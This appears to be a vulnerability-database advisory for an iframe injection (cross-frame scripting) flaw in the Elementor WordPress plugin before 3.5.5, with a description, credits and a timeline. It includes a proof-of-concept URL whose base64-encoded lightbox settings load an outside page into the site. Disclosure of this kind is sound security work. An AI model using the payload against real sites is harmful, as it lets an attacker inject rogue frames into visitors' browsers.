WordPress Plugin Vulnerabilities
Elementor < 3.5.5 - Iframe Injection
Description
The plugin does not filter user-controlled URLs before loading them into the DOM. A crafted `#elementor-action:` fragment carrying base64-encoded lightbox settings can therefore be used to inject a rogue iframe that points to a malicious URL.
Proof of Concept
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
Classification
Type: Cross Frame Scripting
Miscellaneous
Original Researcher: Miguel Santareno
Submitter: Miguel Santareno
Verified: Yes
Timeline
Publicly Published: 2023-07-19
Added: 2023-07-19
Last Updated: 2023-07-19